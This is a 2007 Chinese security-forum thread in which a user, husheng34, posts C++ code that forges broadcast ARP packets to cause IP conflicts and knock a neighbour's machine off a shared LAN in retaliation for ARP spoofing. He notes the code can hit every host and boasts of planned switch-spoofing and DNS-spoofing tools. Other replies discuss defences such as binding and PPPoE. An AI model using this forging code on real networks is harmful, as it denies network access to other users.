[讨论]今天彻底封杀了一ARP,好高兴 ARP, 讨论

valen886

[讨论]今天彻底封杀了一ARP,好高兴
议题作者：husheng34
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）


这几天心血来朝,想自己实现TCP协议栈,刚把ARP部分写好,

查资料时发现上不了网了,打开sinffer软件一看,

某人在用arp软件,软件行为如下:

1: 向你发送arp应答包,

作用是:

我的MAC地址是网关,把包都发给我吧

2:向所有地址发送请求包,得到所有机器的MAC地址.

3:向存活主机发送 DNS反向解析,企图得到域名.


//=======================================

我当下就郁闷了,天天ARP别人,现在被人arp,

正好我又刚完ARP协议的应答部分,处理如下

注: 这个类 前面还有一个过滤器,只让目的地址为全F的arp包通过



这里是接收包的入口,Buff为包缓冲地址

int PackCondArpRequest::oper(PVOID Buff)  //接收的包缓冲地址
{
  pARP_HdrFull index = (pARP_HdrFull)Buff; //pARP_HdrFull为arp的包结构


  if( index->ARPHdr.DIP.mLong !=  _ip.mLong) //目的地址不是本机,则返回
    return -1;

  if( index->ARPHdr.op !=  0x0100)  //请求包
    return -1;

  printf("arp处理\n");

  ARP_HdrFull arpbuff;


  GetPackArp getbuff;  
           //构造自己的arp应答包

  int leng = getbuff.GetArp(&arpbuff,index->ARPHdr.SMAC,index->ARPHdr.SIP,_mac,_ip,2);  // 参数2: 目的MAC地址为包源地址,
       参数3: 目的IP地址为包源地址,
       参数4: 源MAC的地址为自己MAC地址,
      参数5 源MAC的地址为自己MAC地址,
      参数6,类型为2,是应答包
  leng = _Device->Send(&arpbuff,leng);

  return 0;
}


//============================================

把这个类改了改,如下,因为是临时写的,封装的很乱,

int PackCondArpRequest::oper(PVOID Buff)
{
  pARP_HdrFull index = (pARP_HdrFull)Buff;

  

  uIpAddr TIP;      //建一个网关地址,
  
  TIP.mStruct.byte1 = 192;
    TIP.mStruct.byte2 = 168;
      TIP.mStruct.byte3 = 1;
        TIP.mStruct.byte4 = 1;



  if( index->ARPHdr.DIP.mLong == TIP.mLong)    //如果目的地址是网关,就返回吧,总要让人家上网啊!
    return -1;



  if( index->ARPHdr.SMAC.mLongShort.mLong ==  _mac.mLongShort.mLong &&

    index->ARPHdr.SMAC.mLongShort.mShort == _mac.mLongShort.mShort ) //如果源MAC地址是那个家伙的,就执行封杀,如果去掉,则表示任何人
  {
   


  ARP_HdrFull arpbuff;


  GetPackArp getbuff;  
  
  uMacAddr AllMAC;             //建一个目的MAC地址,全F表示所有,广播拉
  AllMAC.mLongShort.mLong = 0xFFFFFFFF;
  AllMAC.mLongShort.mShort = 0xFFFF;


  uMacAddr TMAC;            // 建一个临时的MAC地址,做为源MAC地址
  TMAC.mLongShort.mLong = 0x11111111;
  TMAC.mLongShort.mShort = 0x1111;

  
  

           //建一个包,这个包的意思是:

           //以那个家伙的IP,MAC为1的地址,向所有的机器发送网关的 ARP请求包,

           后果是,他会弹出IP冲突,网关会失去配置,无法上网,

  int leng = getbuff.GetArp(&arpbuff,AllMAC,TIP,TMAC,index->ARPHdr.SIP);

  leng = _Device->Send(&arpbuff,leng);


  printf("arp处理\n");

  }

  return 0;
}

/====================================

通过以上代码,我就实现了,只他那个家伙向任何一台机器,发送arp请求,就会IP冲突,

当然,如果去掉MAC地址过滤,任何内网机器访问其它,除网关的电脑都会IP冲突,

不过如果愿望,也改成其它方式的封锁,

那个家伙在改了一个又一个IP以后,终于死心,关闭了他的arp软件,

我在家里得意的笑啊
帖子78 精华2 积分3543 阅读权限100 性别男 在线时间112 小时 注册时间2006-4-30 最后登录2008-7-13 查看详细资料引用 报告 回复 TOP 软件项目外包

寻寻
晶莹剔透§烈日灼然

紫禁城

提前绑定IP.不就得了..不会有这种事发生了.吧.zaizai.7blog.net/
帖子84 精华0 积分142 阅读权限40 在线时间97 小时 注册时间2006-7-25 最后登录2008-4-29 查看个人网站
查看详细资料引用 报告 回复 TOP 少女暴富的隐秘（图）

husheng34
荣誉会员

老何

就算网关,和电脑双绑都没用,

一样可以交换机溢出,交换机欺骗等

也可以sinffer,DNS欺骗,网页重定向等等

期待我的 内网欺骗的 类库 写好吧,

想如何玩,就如何玩,内网我说了算

只要是有交换机的地方,就不安全,
帖子78 精华2 积分3543 阅读权限100 性别男 在线时间112 小时 注册时间2006-4-30 最后登录2008-7-13 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

y2k1
晶莹剔透§烈日灼然

yoyoabc

交换机溢出,交换机欺骗。。
交换机欺骗，是不是传说中的跨vlan arp？
帖子8 精华0 积分27 阅读权限40 在线时间12 小时 注册时间2005-5-5 最后登录2008-2-6 查看详细资料引用 报告 回复 TOP

wpsxy
晶莹剔透§烈日灼然

ropedancer

如果要彻底封杀ARP攻击最好的方法是用PPPOE协议验证上网
帖子11 精华0 积分38 阅读权限40 在线时间35 小时 注册时间2006-8-17 最后登录2008-3-8 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

husheng34
荣誉会员

yoyoabc

搞笑吧,你能教会我房东,我佩服你,50岁大妈

刚才又搞定一个arp份子,

我们这里的人太有才了,人手一个啊,

除了楼上的MM以外,可怜的MM常常上不了网,叫我帮忙

又加了个功能,会回应所有arp请求,

用arp一扫,就有250主机,

附带对方网关欺骗,自己MAC和网关MAC修复
帖子78 精华2 积分3543 阅读权限100 性别男 在线时间112 小时 注册时间2006-4-30 最后登录2008-7-13 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘（图）

wpsxy
晶莹剔透§烈日灼然

培记

呵呵
我维护着500台机器的局域网 也是被ARP攻击搞的焦头烂额  最后用Route OS做了 PPPOE协议验证上网后就再也没有出现过ARP攻击了
帖子11 精华0 积分38 阅读权限40 在线时间35 小时 注册时间2006-8-17 最后登录2008-3-8 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

寻寻
晶莹剔透§烈日灼然

tt.niki

引用:
引用第2楼husheng34于2007-06-16 19:29发表的 :
就算网关,和电脑双绑都没用,

一样可以交换机溢出,交换机欺骗等

也可以sinffer,DNS欺骗,网页重定向等等
.......
我看了文章说好像绑定是没事的啊...

http://www.coolall.cn/read.php?27
上面的是个软件你看下....zaizai.7blog.net/
帖子84 精华0 积分142 阅读权限40 在线时间97 小时 注册时间2006-7-25 最后登录2008-4-29 查看个人网站
查看详细资料引用 报告 回复 TOP

flyasky
晶莹剔透§烈日灼然

zhoupeng

前一段时间老是收到局域网ARP攻击的侵扰，用一些防护软件也不行，网管又搞不定，实在受不了，最后自己单独拉了根ADSL，唉，郁闷啊。
帖子1 精华0 积分6 阅读权限40 性别男 在线时间0 小时 注册时间2006-5-15 最后登录2007-6-17 查看详细资料引用 报告 回复 TOP

husheng34
荣誉会员

金羊

我看了文章说好像绑定是没事的啊...

http://www.coolall.cn/read.php?27
上面的是个软件你看下....

//====================================

现在市面上的防arp软件,在没有网关管理权限的情况下,都不可能彻底解决,

最多是时断时续
帖子78 精华2 积分3543 阅读权限100 性别男 在线时间112 小时 注册时间2006-4-30 最后登录2008-7-13 查看详细资料引用 报告 回复 TOP

cnlnfjhh
荣誉会员

影の疾风

引用:
引用第2楼husheng34于2007-06-16 19:29发表的 :
就算网关,和电脑双绑都没用,

一样可以交换机溢出,交换机欺骗等

也可以sinffer,DNS欺骗,网页重定向等等
.......
已经有这种工具了
内网可以安全的 并不是你说的有交换机的就能利用Link...  http://www.secow.com  Or  Msn: cnlnfjhh@gmail.com  
帖子62 精华0 积分2937 阅读权限100 性别男 在线时间53 小时 注册时间2006-10-3 最后登录2008-7-6 查看详细资料引用 报告 回复 TOP

husheng34
荣誉会员

孙林

等写出来就你就知道了,我是直接欺骗交换机的MAC地址,

刷新交换机MAC地址表,

除非他用智能交换机,

做交换机上的MAC绑定,不然无法解决,

软件是无法彻底解决问题的,

去看看交换机工作原理在说吧

当然,有矛就有盾，

如果模拟一个虚拟主机ＩＰ和ＭＡＣ，通过这个地址转发，

这个虚拟主机，不回应arp响应，

对其它机器相当于隐性，是可以躲过的，必竟要发现，才能攻击.

注意是躲过，不是毕免，如果了解原理，一样可以攻击，和上面的话不矛盾

也可以用中间层驱动，修改arp包也能实现，

不过中间层驱动效率和隐定性都是个问题
帖子78 精华2 积分3543 阅读权限100 性别男 在线时间112 小时 注册时间2006-4-30 最后登录2008-7-13 查看详细资料引用 报告 回复 TOP

aspshell
晶莹剔透§烈日灼然

融化冰河

感觉只是一时控制而已``并非封杀`````````
帖子17 精华0 积分59 阅读权限40 性别男 在线时间22 小时 注册时间2007-1-21 最后登录2007-8-9 查看详细资料引用 报告 回复 TOP

silenceshell
晶莹剔透§烈日灼然

BG7LHT

想找到他又这么麻烦啊

用软件查看局域网卡状态
混杂模式的就是他了

然后让他不能上网还不简单啊show more..

帖子35 精华0 积分111 阅读权限40 在线时间65 小时 注册时间2007-6-22 最后登录2008-7-15 查看详细资料引用 报告 回复 TOP

lbjworld
晶莹剔透§烈日灼然

yuyu

ARP协议不完美，所以才出问题的 有没有可以替代的呢。。。Ich habe mich vergessen...

帖子1 精华0 积分6 阅读权限40 性别男 来自tj 在线时间0 小时 注册时间2007-6-23 最后登录2007-6-23 查看详细资料引用 报告 回复 TOP

ziyuesjl
水手

晶莹剔透§烈日灼然

开平车迷网

支持:PPPOE协议验证上网，彻底防御。

帖子7 精华0 积分33 阅读权限40 性别男 来自山东 在线时间15 小时 注册时间2005-10-31 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

沉默的另一面
晶莹剔透§烈日灼然

民进党

交换网络的嗅探原理？？请教
以前还以为双绑就没事了。。今天一看还真是那么回事~~中间还有交换机也是可以arp的！！
现在很多软件使用winpcap嗅探``效果怎么样？？（在网关`主机双绑的交换网络）。。

         我又想了下。。arp应该要是3层以上的交换机吧~~~如果是2层的他连ip都不认识！！是不~~
牛人回啊！！谢啊~~